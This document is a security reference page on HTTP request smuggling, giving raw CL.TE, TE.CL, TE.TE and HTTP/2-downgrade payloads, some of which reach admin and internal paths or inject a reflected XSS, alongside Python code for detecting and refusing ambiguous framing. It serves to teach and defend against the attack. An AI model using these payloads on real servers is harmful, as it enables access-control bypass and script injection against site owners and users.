# HTTP request smuggling

## Content-Length (CL)

{% code lineNumbers="true" %}

```http
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

param1=value1&param2=value2
```

{% endcode %}

## Transfer-Encoding (TE)

{% code lineNumbers="true" %}

```http
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

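1b
param1=value1&param2=value2
0


```

{% endcode %}

The same body as raw bytes. The chunk size `1b` is the hexadecimal length of the chunk data (27 bytes), not counting the CRLF that follows it:

```
1b\r\nparam1=value1&param2=value2\r\n0\r\n\r\n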
```

## CL.TE

The reverse proxy uses the `Content-Length` (CL) HTTP header; the web server uses the `Transfer-Encoding` (TE) HTTP header.

Identification example: if the response to the second request is a `405 Method Not Allowed`, the target may be vulnerable. The web server stops reading at the `0` chunk, so the trailing `HELLO` is left on the connection and becomes the start of the second request.

{% tabs %}
{% tab title="Request 1" %}
{% code lineNumbers="true" %}

```http
POST / HTTP/1.1
Host: example.com
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO
```

{% endcode %}
{% endtab %}

{% tab title="Request 2" %}
{% code lineNumbers="true" %}

```http
GET / HTTP/1.1
Host: example.com


```

{% endcode %}
{% endtab %}
{% endtabs %}

General exploitation example.

{% code lineNumbers="true" %}

```http
POST / HTTP/1.1
Host: example.com
Content-Length: 50
Transfer-Encoding: chunked

0

POST /admin.php?param=value HTTP/1.1
Dummy: 
```

{% endcode %}

Exploitation example to gain access to an internal path.

{% code lineNumbers="true" %}

```http
POST / HTTP/1.1
Host: example.com
Content-Length: 54
Transfer-Encoding: chunked

0

POST /internal HTTP/1.1
Host: localhost
Dummy: 
```

{% endcode %}

Exploitation example for reflected XSS in an HTTP header.

{% code lineNumbers="true" %}

```http
POST / HTTP/1.1
Host: example.com
Content-Length: 81
Transfer-Encoding: chunked

0

GET / HTTP/1.1
HTTP-Header-Vulnerable: "><script>alert(1)</script>
Dummy: 
```

{% endcode %}

## TE.TE

Obfuscate the `Transfer-Encoding` (TE) HTTP header so that one of the components does not honor it, which results in a CL.TE or TE.CL vulnerability.

```sh
Transfer-Encoding: testchunked
Transfer-Encoding : chunked
Transfer-Encoding:[\x09]chunked # [\x09] = horizontal tab
Transfer-Encoding:[\x0b]chunked # [\x0b] = vertical tab
 Transfer-Encoding: chunked
```
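From the defensive side, a front end can refuse or normalise these variants before forwarding. The following is an added example, not part of the original page: `audit_headers` and its messages are illustrative names, and the rules follow the HTTP/1.1 field syntax (token field names, SP/HTAB as optional whitespace, no other control characters).

```python
import re

# RFC 9110 "token": the only characters allowed in a field name.
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# Control characters other than HTAB are not allowed in a field value.
BAD_VALUE = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")

def audit_headers(lines):
    """Return reasons to reject; an empty list means the framing is unambiguous."""
    problems, seen = [], {}
    for raw in lines:                      # raw header lines, without the CRLF
        if raw[:1] in (b" ", b"\t"):
            problems.append("line starts with whitespace")
            continue
        name, sep, value = raw.partition(b":")
        if not sep or not TOKEN.fullmatch(name):
            problems.append(f"invalid field name {name!r}")
            continue
        if BAD_VALUE.search(value):
            problems.append(f"control character in {name.decode()} value")
            continue
        # SP and HTAB around the value are optional whitespace and are stripped.
        seen.setdefault(name.lower(), []).append(value.strip(b" \t").lower())
    te = seen.get(b"transfer-encoding", [])
    cl = seen.get(b"content-length", [])
    if te and te != [b"chunked"]:
        problems.append("Transfer-Encoding is not a single 'chunked'")
    if len(set(cl)) > 1 or any(not v.isdigit() for v in cl):
        problems.append("conflicting or non-numeric Content-Length")
    if te and cl:
        problems.append("both Transfer-Encoding and Content-Length present")
    return problems

# The five header variants listed above, as raw bytes.
VARIANTS = [
    b"Transfer-Encoding: testchunked",
    b"Transfer-Encoding : chunked",
    b"Transfer-Encoding:\tchunked",
    b"Transfer-Encoding:\x0bchunked",
    b" Transfer-Encoding: chunked",
]

if __name__ == "__main__":
    for v in VARIANTS:
        print(v, "->", audit_headers([v]) or "accepted as chunked")
```

The horizontal-tab variant is valid syntax and is accepted as `chunked`; it is only a problem when another hop does not strip the tab, so the front end should re-emit the header in canonical form rather than forward the original bytes.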

## TE.CL

The reverse proxy uses the `Transfer-Encoding` (TE) HTTP header; the web server uses the `Content-Length` (CL) HTTP header.

{% hint style="info" %}
In Burp Suite Repeater, it is important to uncheck the "Update Content-Length" option, add the two requests to a tab group, and send them using the "Send group in sequence (single connection)" function.
{% endhint %}

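Identification example: if the response to the second request is a `400 Bad Request`, the target may be vulnerable. The web server reads only the 3 bytes announced by `Content-Length`, so the rest of the chunked body is left on the connection and is prepended to the second request.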

{% tabs %}
{% tab title="Request 1" %}
{% code lineNumbers="true" %}

```http
GET / HTTP/1.1
Host: example.com
Content-Length: 3
Transfer-Encoding: chunked

5
HELLO
0


```

{% endcode %}
{% endtab %}

{% tab title="Request 2" %}
{% code lineNumbers="true" %}

```http
GET / HTTP/1.1
Host: example.com


```

{% endcode %}
{% endtab %}
{% endtabs %}
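Why the identification requests in the CL.TE and TE.CL sections desynchronise can be checked by framing the same bytes both ways. This is an added example, not part of the original page; the function names are illustrative, and the two samples are the page's "Request 1" payloads with explicit CRLF line endings.

```python
"""Compare how a Content-Length parser and a chunked parser frame one request."""

def split_head(raw: bytes):
    """Return (lower-cased header dict, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:           # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest

def chunked_end(body: bytes) -> int:
    """Offset just past the terminating 0-size chunk and its trailer section."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            break
        pos += size + 2                            # chunk data plus its CRLF
    while True:                                    # trailer fields, then empty line
        eol = body.index(b"\r\n", pos)
        empty = eol == pos
        pos = eol + 2
        if empty:
            return pos

def leftovers(raw: bytes) -> dict:
    """Bytes each interpretation leaves on the connection for the next request."""
    headers, rest = split_head(raw)
    cl = int(headers[b"content-length"])
    return {"CL": rest[cl:], "TE": rest[chunked_end(rest):]}

# Identification requests from this page (CL.TE and TE.CL, Request 1).
CL_TE = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nHELLO")
TE_CL = (b"GET / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 3\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n5\r\nHELLO\r\n0\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("CL.TE", CL_TE), ("TE.CL", TE_CL)):
        print(name, leftovers(raw))
```

A request is framed safely only when both entries are empty; any non-empty leftover is what the disagreeing component would treat as the beginning of the next request.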

General exploitation example (GET).

* 0x2a = 42 bytes

{% tabs %}
{% tab title="Request 1" %}
{% code lineNumbers="true" %}

```http
GET /404 HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

2a
GET /admin HTTP/1.1
Host: example.com


0


```

{% endcode %}
{% endtab %}

{% tab title="Request 2" %}
{% code lineNumbers="true" %}

```http
GET /404 HTTP/1.1
Host: example.com


```

{% endcode %}
{% endtab %}
{% endtabs %}

General exploitation example (POST).

* 0x83 = 131 bytes

{% code lineNumbers="true" %}

```http
GET / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

83
POST /index.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

param=value


0


```

{% endcode %}

Exploitation example to gain access to an internal path.

* 0x2b = 43 bytes

{% tabs %}
{% tab title="Request 1" %}
{% code lineNumbers="true" %}

```http
GET /404 HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

2b
GET /internal HTTP/1.1
Host: localhost


0


```

{% endcode %}
{% endtab %}

{% tab title="Request 2" %}
{% code lineNumbers="true" %}

```http
GET /404 HTTP/1.1
Host: example.com


```

{% endcode %}
{% endtab %}
{% endtabs %}

## HTTP/2 downgrading

The reverse proxy uses HTTP/2, while the web server uses HTTP/1.1.

### H2.CL / CL.0

The reverse proxy does not properly validate that the supplied `Content-Length` (CL) HTTP header is correct and instead rewrites the request to HTTP/1.1 using the faulty `Content-Length` (CL) HTTP header.

{% code lineNumbers="true" %}

```http
POST / HTTP/2
Host: example.com
Content-Length: 0

POST /admin.php?param=value HTTP/1.1
Host: example.com
```

{% endcode %}
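The validation that is missing in this scenario can be sketched as a strict downgrade routine. This is an added example, not part of the original page and not any proxy's real code: `downgrade`, `MalformedRequest` and `is_refused` are hypothetical names, and the checks follow the HTTP/2 rules that `content-length` must equal the DATA payload length and that connection-specific fields are not allowed.

```python
"""Strict HTTP/2 -> HTTP/1.1 request rewriting (illustrative front-end logic)."""

# Connection-specific fields are not allowed in HTTP/2 messages (RFC 9113, 8.2.2).
CONNECTION_SPECIFIC = {"connection", "keep-alive", "proxy-connection",
                       "transfer-encoding", "upgrade"}

class MalformedRequest(Exception):
    """The HTTP/2 request must be refused instead of forwarded."""

def _clean(text: str) -> str:
    if not text.isascii() or any(ch in text for ch in "\r\n\x00"):
        raise MalformedRequest("non-ASCII, CR, LF or NUL in a field")
    return text

def downgrade(method, path, authority, headers, data_frames) -> bytes:
    """headers: list of (name, value) strings; data_frames: list of DATA payloads."""
    if any(ch.isspace() for ch in method + path + authority):
        raise MalformedRequest("whitespace in request line or authority")
    body = b"".join(data_frames)
    lines = [f"{_clean(method)} {_clean(path)} HTTP/1.1", f"Host: {_clean(authority)}"]
    for name, value in headers:
        if name != name.lower() or name in CONNECTION_SPECIFIC:
            raise MalformedRequest(f"field {name!r} is not valid in HTTP/2")
        if name == "content-length":
            # The declared length must equal the bytes received in DATA frames.
            if not (value.isascii() and value.isdigit()) or int(value) != len(body):
                raise MalformedRequest("content-length does not match DATA frames")
            continue                      # re-emitted below from the real length
        lines.append(f"{_clean(name)}: {_clean(value)}")
    lines.append(f"Content-Length: {len(body)}")
    return "\r\n".join(lines).encode("ascii") + b"\r\n\r\n" + body

# The H2.CL request from this page: content-length 0, yet DATA carries bytes.
SMUGGLED = b"POST /admin.php?param=value HTTP/1.1\r\nHost: example.com\r\n"

def is_refused(headers, data_frames) -> bool:
    try:
        downgrade("POST", "/", "example.com", headers, data_frames)
        return False
    except MalformedRequest:
        return True

if __name__ == "__main__":
    print(is_refused([("content-length", "0")], [SMUGGLED]))
    print(downgrade("POST", "/", "example.com", [("content-length", "5")], [b"a=1", b"&b"]))
```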


